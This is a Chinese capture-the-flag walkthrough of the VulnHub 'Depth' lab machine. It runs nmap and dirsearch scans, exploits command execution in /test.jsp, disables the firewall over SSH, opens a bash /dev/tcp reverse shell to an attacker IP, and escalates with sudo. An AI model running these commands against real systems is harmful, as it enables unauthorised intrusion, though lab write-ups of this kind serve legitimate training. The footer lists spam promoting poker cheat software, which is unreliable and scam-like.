【vulnhub】Depth靶机
创始人
2024-11-13 03:41:18
0

靶机安装

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

运行环境:VMware运行该虚拟机

信息收集

靶机IP发现

nmap 192.168.93.0/24

端口扫描

nmap -A 192.168.93.154 -p-

只开起了8080端口

进行目录扫描8080端口

dirsearch -u http://192.168.93.154:8080

有一个目录/test.jsp

IP网址访问

翻译过后为

后面拼接/test.jsp

翻译过后

提示我们输入 ls -l /tmp 测试一下

存在系统命令执行漏洞,进行利用,反弹shell尝试失败

漏洞利用

ls -l /home 查看到home目录内容,发现bill用户

输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。

尝试关闭防火墙

#尝试关闭防火墙 ssh bill@localhost sudo ufw disable

再次执行反弹shell

ssh bill@localhost bash -i >& /dev/tcp/192.168.93.130/8787 0>&1

获取shell成功

提权

尝试sudo提权

sudo -l,发现所有用户(ALL)都有sudo权限,

直接 sudo su 命令

查看flag文件

上一篇:鸿蒙(HarmonyOS)项目方舟框架(ArkUI)之RichText组件

下一篇:两分钟了解!wpk透视软件网站(透视)wepoker确实有挂(有挂指点)

相关内容

热门资讯

专业讨论!德扑之星真破解套路(... 专业讨论!德扑之星真破解套路(辅助挂)软件透明挂(有挂了解)-哔哩哔哩;人气非常高,ai更新快且高清...
每日必看!智星德州菠萝外挂检测... 每日必看!智星德州菠萝外挂检测(辅助挂)软件透明挂(有挂教学)-哔哩哔哩1、玩家可以在智星德州菠萝外...
透视透明挂!轰趴十三水有后台(... 轰趴十三水有后台赢率提升策略‌;透视透明挂!轰趴十三水有后台(辅助挂)软件透明挂(有挂详情)-哔哩哔...
发现玩家!德扑ai助手软件(辅... 发现玩家!德扑ai助手软件(辅助挂)透视辅助(有挂教学)-哔哩哔哩;玩家在德扑ai助手软件中需先进行...
一分钟了解!x-poker辅助... 一分钟了解!x-poker辅助软件(辅助挂)辅助透视(有挂攻略)-哔哩哔哩1、每一步都需要思考,不同...
一分钟揭秘!德州最新辅助器(辅... 一分钟揭秘!德州最新辅助器(辅助挂)透视辅助(有挂攻略)-哔哩哔哩;德州最新辅助器最新版本免费下载安...
玩家攻略推荐!德州辅助(辅助挂... 玩家攻略推荐!德州辅助(辅助挂)辅助透视(有挂了解)-哔哩哔哩是由北京得德州辅助黑科技有限公司精心研...
揭秘真相!pokernow德州... 《揭秘真相!pokernow德州(辅助挂)辅助透视(有挂介绍)-哔哩哔哩》 pokernow德州软件...
五分钟了解!德州之星辅助器(辅... 五分钟了解!德州之星辅助器(辅助挂)辅助透视(有挂透明)-哔哩哔哩1、很好的工具软件,可以解锁游戏的...
推荐一款!pokermaste... 1、推荐一款!pokermaster有外挂(辅助挂)透视辅助(有挂教学)-哔哩哔哩;详细教程。2、p...